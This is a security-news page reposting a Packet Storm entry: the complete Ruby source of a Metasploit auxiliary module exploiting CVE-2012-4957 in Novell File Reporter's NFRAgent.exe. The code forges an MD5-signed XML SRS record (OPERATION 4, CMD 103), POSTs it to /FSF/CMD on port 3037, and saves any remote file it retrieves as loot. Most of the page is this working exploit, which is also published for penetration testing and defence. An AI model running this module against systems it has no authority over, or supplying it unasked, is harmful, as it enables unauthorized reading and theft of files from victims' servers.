Security
Headlines
HeadlinesLatestCVEs

Headline

NFR Agent SRS Record Arbitrary Remote File Access

NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and CMD 103, specifying a full pathname. This Metasploit module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).

Packet Storm
Open in Source
#vulnerability#windows#git#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'         => 'NFR Agent SRS Record Arbitrary Remote File Access',      'Description'  =>  %q{        NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve        arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and        CMD 103, specifying a full pathname. This module has been tested successfully        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File        Reporter 1.0.1).      },      'References'   =>        [          [ 'CVE', '2012-4957' ],          [ 'URL', 'https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/' ]        ],      'Author'       =>        [          'juan vazquez'        ],      'License'      => MSF_LICENSE,      'DisclosureDate' => "Nov 16 2012"    )    register_options(    [      Opt::RPORT(3037),      OptBool.new('SSL', [true, 'Use SSL', true]),      OptString.new('RFILE', [true, 'Remote File', 'c:\\windows\\win.ini'])    ])    register_autofilter_ports([ 3037 ])  end  def run_host(ip)    record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>#{datastore['RFILE']}</PATH></RECORD>"    md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase    message = md5 + record    print_status("Retrieving the file contents")    res = send_request_cgi(      {        'uri'     => '/FSF/CMD',        'version' => '1.1',        'method'  => 'POST',        'ctype'   => "text/xml",        'data'    => message      })    if res and res.code == 200 and not res.body =~ /<RESULT>/      loot = res.body      f = ::File.basename(datastore['RFILE'])      path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])      print_good("#{datastore['RFILE']} saved in #{path}")    else      print_error("Failed to retrieve the file contents")    end  endend

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution
Packet Storm